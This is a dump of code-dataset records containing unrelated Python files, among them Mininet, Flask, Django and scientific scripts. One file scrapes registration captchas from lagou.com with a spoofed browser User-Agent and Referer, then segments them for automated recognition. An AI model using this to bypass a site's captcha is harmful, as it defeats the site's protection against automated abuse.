s2-eth1'&\")\nos.system(\"xterm -e 'tcpdump -i s3-eth1'&\")\nos.system(\"xterm -e 'tcpdump -i s4-eth1'&\")\nh1,h2 = net.hosts[0], net.hosts[1]\nmakeTerm(h1)\nmakeTerm(h2)\nCLI(net)\nnet.stop()\nos.system(\"sudo mn -c\")\nos.system(\"kill -9 $(pidof -x ryu-manager)\")\n","sub_path":"ryu/app/openstate/playground/start_many_to_1_alternative.py","file_name":"start_many_to_1_alternative.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"14427081","text":"import cv2\r\nimport numpy as np \r\nimport glob\r\n\r\n\r\ndef resize(image, size, interpolation): #To resize the image to a square and maintain aspect ratio\r\n height, width = image.shape[:2]\r\n c = None if len(image.shape) < 3 else image.shape[2]\r\n if height == width: return cv2.resize(image, (size, size), interpolation)\r\n if height > width: diff = height\r\n else: diff = width\r\n x_pos = int((diff - width)/2.)\r\n y_pos = int((diff - height)/2.)\r\n if c is None:\r\n mask = np.zeros((diff, diff), dtype=image.dtype)\r\n mask[y_pos:y_pos+height, x_pos:x_pos+width] = image[:height, :width]\r\n else:\r\n mask = np.zeros((diff, diff, c), dtype=image.dtype)\r\n mask[y_pos:y_pos+height, x_pos:x_pos+width, :] = image[:height, :width, :]\r\n return cv2.resize(mask, (size, size), interpolation)\r\n\r\n\r\n\r\ni=1\r\nfor filename in glob.glob(r\" \"):\r\n print(\"Processing %s\" % filename)\r\n inp_image = cv2.imread(filename)\r\n img = cv2.cvtColor(inp_image, cv2.COLOR_BGR2GRAY)\r\n resized = resize(inp_image,420, cv2.INTER_AREA)\r\n cv2.imwrite(r'image.{0}.png'.format(i),resized)\r\n i=i+1\r\n \r\nprint('All images resized')","sub_path":"Image_resizing_with_aspectratio.py","file_name":"Image_resizing_with_aspectratio.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"539674107","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\n# 데이터\nwine = pd.read_csv('ml\\data\\winequality-white.csv', sep=';', encoding = 'utf-8')\n\ncount_data = wine.groupby('quality')['quality'].count()\nprint(count_data)\n\ncount_data.plot()\nplt.savefig('ml\\wine-count-plt.png')","sub_path":"mlearn/m06_wine.py","file_name":"m06_wine.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"317080943","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n__author__ = 'xiaosong Liu'\n\nimport os\nimport time\nimport uuid\nimport asyncio\nimport aiohttp\nimport aiofiles\nimport cv2\nimport numpy as np\n\nsemaphore = asyncio.Semaphore(5)\n\nasync def download_images():\n dirpath = 'pic_temp'\n url = 'https://passport.lagou.com/vcode/create?from=register&refresh=1451121012510'\n filename = 'lagou-'+ str(uuid.uuid1())\n pic_save_path = os.path.join(dirpath,filename)\n headers_ = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36\",\n \"Referer\": 'https://passport.lagou.com/'\n }\n\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n\n async with semaphore:\n async with aiohttp.ClientSession() as session:\n async with session.get(url,headers=headers_) as html:\n try:\n pic_images = await html.read()\n except:\n print(html.status)\n if pic_images:\n f = await aiofiles.open(pic_save_path + '.bmp','wb')\n await f.write(pic_images)\n \n return True\n else:\n return False\n\n\ndef asysnc_download():\n\n start_time = time.time()\n\n loop = asyncio.get_event_loop()\n download_tasks = [download_images() for i in range(100)]\n loop.run_until_complete(asyncio.wait(download_tasks))\n loop.close()\n\n end_time = time.time()\n\n print('下载完成: 费时%.3f秒!' % (end_time - start_time))\n\ndef load_images(path):\n subpath_or_file = os.listdir(path)\n pic_name_list = [f for f in subpath_or_file if os.path.isfile(os.path.join(path,f))] #isfile()只能判断当前目录下./,所以需要加绝对路径\n img_vec = []\n for pic_name in pic_name_list:\n image = cv2.imread(os.path.join(path,pic_name))\n img_vec.append(image)\n\n return img_vec\n\ndef image_show(image,img_name='image'):\n cv2.namedWindow(img_name) \n cv2.imshow(img_name, image) \n cv2.waitKey (0) \n cv2.destroyAllWindows() \n\n#图片灰度化\ndef image_grayscale(image):\n img_gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n return img_gray\n\n#均值滤波\ndef mean_filter(image):\n img_filter = cv2.medianBlur(image,3)\n return img_filter\n\n#二值化\ndef image_binarization(image,threshold=128):\n img_height = image.shape[0]\n img_width = image.shape[1]\n\n for i in range(img_height):\n for j in range(img_width):\n if image[i,j]< threshold:\n image[i,j] = 0\n else:\n image[i,j] = 255\n return image\n\n#图像锐化\ndef image_sharp(image,flag1=0,flag2=0):\n img_height = image.shape[0]\n img_width = image.shape[1]\n\n img_sharp = np.zeros(image.shape,np.uint8)\n for i in range(img_height-1):\n for j in range(img_width-1):\n if flag2 == 0:\n x = abs(image[i,j+1]-image[i,j])\n y = abs(image[i+1,j]-image[i,j])\n else:\n x = abs(image[i+1,j+1]-image[i,j])\n y = abs(image[i+1,j]-image[i,j+1])\n if flag1 == 0:\n img_sharp[i,j] = max(x,y)\n else:\n img_sharp[i,j] = x+y\n return img_sharp \n\n#图像的开操作; 开操作 = 腐蚀->膨胀;\ndef image_open(image):\n ret, binary = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU) \n kernel=cv2.getStructuringElement(cv2.MORPH_RECT,(5,5)) \n #形态学操作 \n #第二个参数:要执行的形态学操作类型,这里是开操作 \n img_open =cv2.morphologyEx(binary,cv.MORPH_OPEN,kernel)\n\n return img_open\n\n#图像的闭操作;闭操作 = 膨胀->腐蚀;\ndef image_close(image): \n ret, binary = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU) \n kernel=cv2.getStructuringElement(cv2.MORPH_RECT,(1,1)) \n #形态学操作 \n #第二个参数:要执行的形态学操作类型,这里是开操作 \n img_close = cv2.morphologyEx(binary,cv2.MORPH_CLOSE,kernel) \n\n return img_close\n \n#对完整二维码图片垂直切割成单个字母\ndef image_vertical_segmentation(image,padding=4,blank=3):\n img_height = image.shape[0]\n img_width = image.shape[1]\n split_x = []\n img_split_vec = []\n x = 0\n while (True):\n if x >= img_width:\n break\n if np.sum(image[:,x]==0)>padding:\n x_start = x\n x_stride = 0\n while(True): \n x_stride += 1\n if x + x_stride == img_width:\n break\n if(np.sum(image[:,x+x_stride]==0)= img_height:\n break\n if np.sum(image[y,:]==0)>padding:\n y_start = y\n while(True):\n y_stride += 1\n y_end = img_height-y_stride\n if(np.sum(image[y_end,:]==0)>padding):\n break\n break\n y += 1\n\n index_start = y_start - blank \n index_end = y_end + blank\n img_single_ = image[index_start:index_end,:]\n\n return img_single_\n\n#去除噪声\ndef image_preprocessing(image):\n img_gray = image_grayscale(image)\n #img_binarization = image_binarization(img_gray,200)\n img_mean_filter = mean_filter(img_gray)\n #image_show(img_mean_filter)\n #img_close = image_close(img_mean_filter)\n #image_show(img_close,filename)\n img_binarization = image_binarization(img_mean_filter,220)\n #print(img_mean_filter[20:26,0:100])\n #image_show(img_binarization)\n #image_imaxsharp = image_sharp(img_binarization)\n #image_iaddsharp = image_sharp(img_binarization,1)\n #image_show(image_iaddsharp,filename)\n #iAddSharp = Sharp(image,1)\n #iRMaxSharp = Sharp(image,0,1)\n #iRAddSharp = Sharp(image,1,1)\n return img_binarization\n\ndef image_save(dirpath,filename,image):\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n save_dirpath_filename = os.path.join(dirpath,filename)\n cv2.imwrite(save_dirpath_filename+'.bmp',image)\n\n return True\n\ndef image_expansion(image):\n img_height = image.shape[0]\n img_width = image.shape[1]\n \n left_exp = int((img_height - img_width) / 2)\n right_exp = img_height - img_width - left_exp\n\n image_expansion = cv2.copyMakeBorder(image,\n 0, 0, left_exp, right_exp,\n cv2.BORDER_CONSTANT,\n value = [255, 255, 255,255])\n return image_expansion\n\ndef main():\n dirpath = 'pic_temp'\n save_dirpath = 'split_pic_temp'\n img_vec = load_images(dirpath)\n\n img_single_vec = []\n for image_ in img_vec[20:25]:\n img_dropnoises = image_preprocessing(image_)\n img_split_vec = image_vertical_segmentation(img_dropnoises)\n for img_split_ in img_split_vec:\n image_show(img_split_)\n if img_split_.shape[0] >= img_split_.shape[1]: #判断图片是否垂直分割出单个字母\n img_expansion = image_expansion(img_split_)\n print(img_expansion.shape)\n image_show(img_expansion)\n #filename = str(uuid.uuid1())\n #image_save(save_dirpath,filename,img_split_)\n #img_single_ = image_horizontal_segmentation(img_split_)\n #image_show(img_single_)\n #img_single_vec.append(img_single_)\n \n #for img_single_ in img_single_vec:\n # filename = str(uuid.uuid1())\n # image_save(save_dirpath,filename,img_single_)\n\n print('图片切割并保存完成!')\n\nif __name__ == '__main__':\n main()\n #asysnc_download()","sub_path":"CaptchaRecognize/ImagePreprocessing.py","file_name":"ImagePreprocessing.py","file_ext":"py","file_size_in_byte":8300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"222019503","text":"# Question -14\n\n\"\"\"\nWrite a program that accepts a sentence and calculate the number of upper case letters and lower case letters.\n\n! Suppose the following input is supplied to the program:\n\n? Hello world!\n\n! Then, the output should be:\n\n? UPPER CASE 1\n? LOWER CASE 9\n\n\"\"\"\n\nword = input(\"Enter word\")\nupper,lower = 0,0\n\nfor i in word:\n if 'a' <=i and i <= 'z':\n lower += 1\n if 'A' <=i and i <= 'Z':\n upper +=1\n \nprint(f\"Upper Case {upper}\\n Lower Case {lower}\\n\")","sub_path":"Day4/program14.py","file_name":"program14.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343857941","text":"import csv\nimport os\nimport threading\nimport time\nfrom functools import wraps\n\nlock = threading.Lock() ## i need this for printing things in the correct order on the standard output\n\n\ndef _timeFunctionCalls(rounds, function, *args, **kwargs):\n results = dict()\n for i in range(rounds):\n run = 0\n time1 = time.perf_counter()\n function(*args, **kwargs)\n run = time.perf_counter() - time1\n results[i+1] = run\n return results\n\n\ndef benchmark(warmups=0, iter=1, verbose=False, csv_file=None):\n def decorator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n result = func(*args,**kwargs) ##store the function result for return\n warm = dict()\n if warmups != 0:\n warm = _timeFunctionCalls(warmups, func, *args, **kwargs)\n invoke = _timeFunctionCalls(iter, func, *args, **kwargs)\n # without the lock things were overlapping on the screen\n lock.acquire()\n if verbose:\n \n print(\"{:<8} {:<15} {:<10}\".format(\n 'run num', 'is warmup', 'time'))\n \n for k, v in warm.items():\n print(\"{:<8} {:<15} {:<10}\".format(k, 'yes', v))\n\n for k, v in invoke.items():\n print(\"{:<8} {:<15} {:<10}\".format(k+warmups, 'no', v))\n\n avg = sum(invoke.values()) / iter\n variance = sum((v - avg) ** 2 for v in invoke.values()) / iter\n print(\"\\n{:<8} {:<15}\\\n \\n{:<8} {:<15}\\n\"\\\n .format('average time', avg,\\\n 'variance',variance))\n \n lock.release()\n if csv_file:\n with open(csv_file, \"a\") as f:\n writer = csv.writer(f)\n \n\n writer.writerow(['THREAD:',threading.current_thread().getName(),''])\n writer.writerow(['run num', 'is warmup', 'timing'])\n for k, v in warm.items():\n writer.writerow([k, 'yes', v])\n for k, v in invoke.items():\n writer.writerow([k+warmups, 'no', v])\n \n \n writer.writerow(['average', avg,''])\n writer.writerow(['variance', variance,''])\n writer.writerow(['','',''])\n return result\n return wrapper\n return decorator\n\n\ndef _rec_fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return _rec_fibonacci(n-1) + _rec_fibonacci(n-2)\n\ndef fibonacci(n=0):\n #using an helper function so the decorator doesn't execute its extra code for each recursive call\n return _rec_fibonacci(n)\n\n\ndef test():\n files = [\"f_1_16.csv\",\"f_2_8.csv\",\"f_4_4.csv\",\"f_8_2.csv\"]\n #clear the existing files\n [os.remove(f) for f in files if os.path.isfile(f)]\n threads = list()\n for i in range(4):\n threads.clear()\n it = 2**i\n print(\"\\n\\nNUMBER OF THREADS:{}\\n\\n\".format(it))\n fib = benchmark(iter=int(16/it),verbose=True,warmups=3, csv_file=files[i])\n fib = fib(fibonacci)\n [threads.append(threading.Thread(target=fib,args=(10,),name='{}-{}'.format(it,j+1))) for j in range(it)]\n [thread.start() for thread in threads]\n [thread.join() for thread in threads]\n\n\"\"\"\nBy executing the test function and comparing the results we can see\nthat increasing the number of threads does not bring any\nsignificant improvement in the run time. \n\nThis is caused by the Global Interpreter Lock.\nAs we know only one thread at a time is allowed to run python bytecode and this siginificantly impact on the effects\nthat multithreading usually has.\n\nThe fibonacci function used as a test is CPU bound, so the GIL is not released until completion.\n\n\"\"\"\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"Assignment2/Python/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163690004","text":"# use numpy for array operations\nimport numpy as np\n# import sys for file and path stuff\nimport sys\nsys.path.append('../Utilities')\n# import the util file.\nimport Utilities as util\n# import the plotting utility file\nimport PlotUtilities as plotUtil\n# import cycling..\nfrom itertools import cycle\nimport matplotlib.pyplot as plt\nimport scipy.cluster.vq as cluster \nfrom scipy import interpolate\n\ndef convertTimeToIndex(times,frameRate=0.1):\n return np.round(times / frameRate)\n\ndef getMinimumTime(values,times,value,lessThanBool=False):\n minimumTimes = -1 * np.ones((len(values),1))\n # the times to interpolate the times. XXX probably \n # want to make this a constant of some kind.\n numPoints = 1000\n # get the bounds for interpolation\n # get the interpolation grid\n for i,listV in enumerate(values):\n timeRaw = times[i]\n timeGrid = np.linspace(0,np.max(timeRaw),numPoints)\n listTmp = np.interp(timeGrid,timeRaw,listV)\n # need to make sure we start below the lower bound\n # or send above the upper bound\n lessThan =(listTmp <= value)\n greaterThan = (listTmp >= value) \n if (lessThanBool):\n toTest = lessThan\n else:\n toTest= greaterThan\n # if our condition isn't true for any time,\n # ignore the protein (ie: it wasn't ever less than\n # the lower bound or greater than the upper bound)\n if not np.any(toTest):\n continue\n # look for the lowest squared difference from the desired value.\n diffArr = (listTmp-value)**2\n firstIndex = np.argmin(diffArr)\n # get the best interpolated time.\n bestTime = timeGrid[firstIndex]\n minimumTimes[i] = bestTime\n return minimumTimes\n\ndef getDifferentialTime(valuesBefore,valuesAfter):\n # returns when we have a well-defined unfolding...\n numVals = len(valuesBefore)\n indices= []\n diffTime = []\n for i in range(numVals):\n first = valuesBefore[i]\n second = valuesAfter[i]\n if (first < 0 or second < 0):\n continue\n if (first >= second):\n continue\n # POST: non negative, values 'match'\n indices.append(i)\n # append the proper diff time\n diffTime.append(second-first)\n return diffTime,indices\n\ndef getDistances(goodFRET,goodTimes):\n # goodFRET is defined by the API as the FRET ratio from GetTraces.\n # This essentially means it has been corrected for objects which have\n # ill-defined trajectories or difusion coeffs\n # RETURNS: the 'good' distances and time found, as well as the indexing array\n distances = []\n times = []\n indices = []\n nodeIndices = []\n count = 0\n for t,FRET in zip(goodTimes,goodFRET):\n # this is the trace, FRET, and diff for each protein\n # force some reason we have negative data? (Figure this out)\n # XXX make the ugly where thing into a find.\n # XXX figure out how to fix this..\n goodIndices = np.where(FRET > 0)[0]\n if ((len(goodIndices) == 0) or \n (min(goodIndices) == max(goodIndices))):\n indices.append([])\n continue\n betterFRET = FRET[goodIndices]\n betterTime = t[goodIndices]\n betterTime -= np.min(betterTime)\n distanceValues = betterFRET**(1/6)\n distances.append(np.array(distanceValues))\n indices.append(np.array(goodIndices))\n times.append(np.array(betterTime))\n nodeIndices.append(count)\n count += 1\n return np.array(distances),np.array(times),np.array(indices),np.array(nodeIndices)\n\n\ndef GetPhysicsMain(goodTimes,goodFRET,goodDiff):\n source = 'Step2::GetPhysics'\n util.ReportMessage(\"Starting\",source)\n colors = ['r','g','b','k','m','c','y','0.33','0.66']\n colorCycle = cycle(colors)\n count = 0\n fig = plotUtil.pFigure()\n # XXXfill all these in! based on video size\n frameRate = 0.1\n maxNumTimes = 30*10\n distances,times,definedDistancesIdx,nodeIdx =getDistances(goodFRET,goodTimes)\n # get just the 'nodes' with valid valued.\n # flatten the distances to get a notion of the 'all time'\n # distance information. We can use this and kmeans to find a 'folded\n # and unfolded sttae\n flattenDistances = np.concatenate(distances)\n # use two clusters; folded and unfolded\n numClusters = 2\n # lots of iterations (this number seems to work well; the 'smooth'\n # running time / convergence (?) of kmeans is polynomial\n # http://en.wikipedia.org/wiki/K-means_clustering\n numIters = int(1e3)\n clusters,ignore = cluster.kmeans(flattenDistances,numClusters,iter=numIters)\n # the clusters give us the 'folded' and 'unfolded' groups. between those, we have\n # a fairly undefined state.\n folded = min(clusters)\n unfolded = max(clusters)\n clusters = [unfolded,folded]\n \n folded = getMinimumTime(distances,times,folded,False)\n unfolded = getMinimumTime(distances,times,unfolded,True)\n diffTime, definedUnfoldingIdx = getDifferentialTime(folded,unfolded)\n\n goodDiff = util.takeSubset(goodDiff,\n [nodeIdx,definedUnfoldingIdx])\n\n plt.xscale('log', nonposy='clip')\n plt.xlabel('Time since protein (seconds)')\n plt.ylabel('FRET d distance (arb)')\n fig = plotUtil.pFigure()\n numPlots = 2\n plotCount = 1\n fretLabel = 'FRET d Distance (arb)'\n ax = plt.subplot(numPlots,1,plotCount)\n plotUtil.histogramPlot(ax,fretLabel,'# Proteins',\n 'FRET Distance histogram',flattenDistances,\n len(flattenDistances)/100,True,True)\n # plot guiding lines for the two clusters we found\n normalClusters = plotUtil.normalizeTo(flattenDistances,clusters)\n plt.axvline(normalClusters[0])\n plt.axvline(normalClusters[1])\n \n plotCount += 1\n ax = plt.subplot(numPlots,1,plotCount)\n plotUtil.histogramPlot(ax,'Unfolding time distribution','# Proteins',\n 'Unfolding time (seconds) ',diffTime,\n len(diffTime)/100,True,True)\n\n\n plotUtil.saveFigure(fig,'tmp2')\n # return the good unfolding times and differential coefficients\n return diffTime,goodDiff\n\n \n","sub_path":"Stage2_TracesToPhyscs/GetPhysics.py","file_name":"GetPhysics.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"446890622","text":"from flask import Flask, request, render_template, redirect, flash, session\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom models import *\nfrom forms import AddPet, EditPet\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///adopt'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SECRET_KEY'] = 'BABBaada'\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\ndebug = DebugToolbarExtension(app)\n\nconnect_db(app)\n\n\n@app.route('/')\ndef home_page():\n pets = Pet.query.all()\n return render_template('home.html', pets=pets)\n\n\n@app.route('/add', methods=['GET', 'POST'])\ndef add_pet():\n form = AddPet()\n\n if form.validate_on_submit():\n name = form.name.data\n species = form.species.data\n photo_url = form.photo_url.data\n age = form.age.data\n notes = form.notes.data\n\n pet = Pet(name=name, species=species,\n photo_url=photo_url, age=age, notes=notes)\n db.session.add(pet)\n db.session.commit()\n flash(f'created new pet: name of {name}, species is {species}')\n return redirect('/')\n else:\n return render_template('add_pet_form.html', form=form)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef pet_page(id):\n pet = Pet.query.get_or_404(id)\n form = EditPet(obj=pet)\n\n if form.validate_on_submit():\n\n pet.photo_url = form.photo_url.data\n pet.notes = form.notes.data\n pet.available = form.available.data\n db.session.commit()\n return redirect('/')\n else:\n\n return render_template('pet_display.html', form=form, pet=pet)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"644173665","text":"\nimport os\nimport time\nimport mimetypes\n\nfrom pathlib import Path\nfrom django.apps import config\nfrom django.core.files import uploadedfile, File\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView, ListView, CreateView\nfrom django.core.files.storage import FileSystemStorage\nfrom django.urls import conf, reverse_lazy\nfrom django.views.generic.edit import FormView\nfrom django.views.static import serve\n\nfrom .models import UploadExtras\nfrom .forms import ConfigUpload, ExtrasUpload\nfrom .generator.generation import dag_generation_v1\nfrom .generator.file_count import file_count\n\n\n\n\n\nclass Home(TemplateView):\n template_name = 'home.html'\n\n\ndef block_sort(yaml_config):\n file_list=file_count(yaml_config)\n file_list=file_list.task_master()\n return file_list\n\n\ndef upload(request):\n if request.method == 'POST':\n config_path = Path(__file__).parent\n config_path = Path( config_path , './generator/dag_files/')\n file_list=os.listdir(config_path)\n \n for file in file_list:\n if file != \"__init__.py\" and file != \"__pycache__\":\n file_path = Path(__file__).parent\n file_path = Path( file_path , './generator/dag_files/{}'.format(file))\n os.remove(file_path)\n else:\n pass\n extras_path = Path(__file__).parent\n extras_path = Path( extras_path , './generator/resultFile/')\n dag_list=os.listdir(extras_path)\n \n for file in dag_list:\n if file != \"__init__.py\" and file != \"__pycache__\":\n extras_path = Path(__file__).parent\n extras_path = Path( extras_path , './generator/resultFile/{}'.format(file))\n os.remove(extras_path)\n else:\n pass\n\n form = ConfigUpload(request.POST, request.FILES)\n yaml_config_name, yaml_config = str(request.FILES['configs']), request.FILES['configs']\n if \"(application/x-yaml)\" in str(request.FILES):\n if form.is_valid():\n path = Path(__file__).parent\n path = Path( path , './generator/dag_files/{}'.format(yaml_config_name))\n with open(path, 'wb+') as destination:\n for chunk in yaml_config.chunks():\n destination.write(chunk)\n request.session[\"file_list\"]=block_sort(yaml_config)\n request.session[\"yaml_config_name\"]=yaml_config_name\n context = {'msg' : 'File successfully uploaded'}\n return redirect('/upload_extras/')\n\n \n else:\n form = ConfigUpload()\n return render(request, 'upload.html', {'form':form})\n\n\ndef extra_uploads(request):\n if request.method == 'POST':\n form = ExtrasUpload(request.POST, request.FILES)\n files = request.FILES.getlist('files')\n if form.is_valid():\n\n file_list = request.session.get(\"file_list\", \"[]\")\n upload_list=[]\n for f in files:\n upload_list.append(f.name)\n path = Path(__file__).parent\n path = Path( path , './generator/dag_files/{}'.format(f.name))\n with open(path, 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n\n path = Path(__file__).parent\n path = Path( path , \"./generator/dag_files/\")\n uploaded_files=os.listdir(path)\n\n for file in file_list:\n if file in upload_list or file in uploaded_files:\n context = {'msg' : 'File successfully uploaded'}\n pass\n else:\n context = {'msg' : 'Based on uploaded config you are missing file {}'.format(file)}\n return render(request, 'upload_extras.html', context)\n break\n if context == {'msg' : 'File successfully uploaded'}:\n yaml_config = request.session.get(\"yaml_config_name\", \"\")\n dagger=dag_generation_v1(yaml_config)\n dagger.task_master()\n\n return redirect('/result_file/')\n else:\n form = ExtrasUpload()\n return render(request, 'upload_extras.html', {'form':form}) \n\ndef viewer(request):\n path = Path(__file__).parent\n path = Path( path , \"./generator/resultFile/\")\n dag_list = os.listdir(path)\n if len(dag_list) > 0:\n path = Path( path , \"./{}\".format(dag_list[0]))\n f = open(path)\n file_contents = f.read()\n f.close()\n args = {'dag': file_contents}\n\n return render(request, \"dag_render.html\", args)\n else:\n context = {'msg' : 'Proper files have not been uploaded, please reupload your docs '}\n return render(request, 'home.html', context)\n\n\ndef download_dag(request):\n if request.method=='GET':\n path = Path(__file__).parent\n path = Path( path , \"./generator/resultFile/\")\n dag_list = os.listdir(path)\n if len(dag_list) > 0:\n print(\"yes\")\n dag_name=dag_list[0]\n path = Path( path , \"./{}\".format(str(dag_name)))\n f = open(path, 'rb')\n mime_type, _ = mimetypes.guess_type(path)\n response = HttpResponse(f, content_type=mime_type)\n response['Content-Disposition'] = 'attachment; filename=%s' % str(dag_name)\n f.close()\n return response\n else:\n context = {'msg' : 'Proper files have not been uploaded, please reupload your docs '}\n return render(request, 'home.html', context)\n\ndef config_remove(yaml_config):\n path = Path(__file__).parent\n path = Path( path , './generator/dag_files/{}'.format(yaml_config))\n time.sleep(15)\n os.remove(path)\n \n ","sub_path":"fileparse/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"91917687","text":"#!/bin/python3\n\nimport argparse\n\nfrom commandswitcher import CommandSwitcher\n\nif __name__ == '__main__':\n p = argparse.ArgumentParser(description='Processing messages coming from TELEGRAM-CLI as arguments')\n p.add_argument('msg', metavar='msg', type=str, help='received message')\n args = p.parse_args()\n\n if args.msg == None:\n print(\"ERROR: Could not get message!\")\n exit()\n\n cmd_switcher = CommandSwitcher(args.msg)\n cmd_switcher.execute()\n\n\n\n\n\n\n","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"300626105","text":"from sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\n\n\n# RFR\ndf = pd.read_excel('C:/Users/Asus/PycharmProjects/CSE498R/compressive_strength.xlsx')\ndata = df.iloc[:, 0:8]\nX = data.iloc[:, 1:].values\ny = data.iloc[:, :1].values\ny = np.array(y).reshape(-1, 1)\nsc_X = StandardScaler()\nsc_y = StandardScaler()\nX = sc_X.fit_transform(X.reshape(-1, 7))\ny = sc_y.fit_transform(y.reshape(-1, 1))\nX_trn, X_tst, y_trn, y_tst = train_test_split(X, y, test_size=0.3)\n\nfrom sklearn.ensemble import RandomForestRegressor\nregressor = RandomForestRegressor(n_estimators=100, criterion='mse', bootstrap=True, max_depth=10, random_state=42)\nregressor.fit(X_trn.reshape(-1, 7), y_trn.reshape(-1, 1).ravel())\ny_predd = regressor.predict(X_tst)\ny_predds = sc_y.inverse_transform(y_predd)\n\n\nprint(\"MSE\")\nprint(mean_squared_error(y_tst, y_predd))\nprint(\"RMSE\")\nprint(mean_squared_error(y_tst, y_predd, squared=False))\nprint(\"MAE\")\nprint(mean_absolute_error(y_tst, y_predd))\nshow = pd.DataFrame({'Real Values': sc_y.inverse_transform(y_tst.reshape(-1)), 'Predicted Values': y_predd})\nprint(show)\n\n\nplt.scatter(y_tst, y_predd)\nplt.plot([y_tst.min(), y_tst.max()], [y_tst.min(), y_tst.max()], 'k--', 'lw=2')\nplt.title('Random Forest Regression')\nplt.xlabel('Predicted Values')\nplt.ylabel('Actual Values')\nplt.show()\n\nsns.displot(y_predd, label=\"Predicted\")\nsns.displot(y_tst, label=\"Real\")\nplt.show()\n\n\nparam_grid = {'n_estimators': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n # 'max_features': ['auto', 'sqrt', 'log2'],\n 'max_depth': [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, None],\n 'criterion': ['mse'],\n 'bootstrap': [True, False]}\noptimal_params = GridSearchCV(RandomForestRegressor(),\n param_grid,\n cv=3,\n verbose=0,\n n_jobs=-1)\n\noptimal_params.fit(X_trn, y_trn.ravel())\nprint(optimal_params.best_params_)\n","sub_path":"compressive/compressive3.py","file_name":"compressive3.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"258443206","text":"r\"\"\"\n.. codeauthor:: David Zwicker \n\nThis module contains classes for handling a single boundary of a non-periodic\naxis. Since an axis has two boundary, we simply distinguish them by a boolean\nflag `upper`, which is True for the side of the axis with the larger coordinate.\n\nThe module currently supports different boundary conditions:\n\n* :class:`~pde.grids.boundaries.local.DirichletBC`:\n Imposing the value of a field at the boundary\n* :class:`~pde.grids.boundaries.local.NeumannBC`:\n Imposing the derivative of a field in the outward normal direction at the\n boundary\n* :class:`~pde.grids.boundaries.local.MixedBC`:\n Imposing the derivative of a field in the outward normal direction\n proportional to its value at the boundary \n* :class:`~pde.grids.boundaries.local.CurvatureBC`:\n Imposing the second derivative (curvature) of a field at the boundary\n* :class:`~pde.grids.boundaries.local.ExtrapolateBC`:\n Extrapolate boundary points linearly from the two points closest to the\n boundary\n\nDerivatives are given in the direction of the outward normal vector, such that\npositive derivatives correspond to a function that increases across the\nboundary, which corresponds to an inwards flux. Conversely, negative\nderivatives are associated with effluxes.\n\"\"\"\n\nfrom abc import ABCMeta, abstractmethod\nimport numbers\nfrom typing import Any, Union, Tuple, Dict, Sequence, Optional, Callable, List\n \nimport numpy as np\n\nfrom ..base import GridBase\nfrom ...tools.numba import jit\nfrom ...tools.expressions import ScalarExpression\n\n\n\nVectorType = Optional[Sequence[float]]\nTensorType = Optional[Sequence[Sequence[float]]]\nBoundaryData = Union[Dict, str, \"BCBase\"]\n\n\n\nclass DomainError(ValueError):\n \"\"\" exception indicating that point lies outside domain \"\"\" \n pass\n\n\n\nclass PeriodicityError(RuntimeError):\n \"\"\" exception indicating that the grid periodicity is inconsistent \"\"\"\n pass\n\n\n\ndef _get_arr_1d(arr, idx: Tuple[int, ...], axis: int) \\\n -> Tuple[Any, int, Tuple[int, ...]]:\n \"\"\" extract the 1d array along axis at point idx\n \n Args:\n 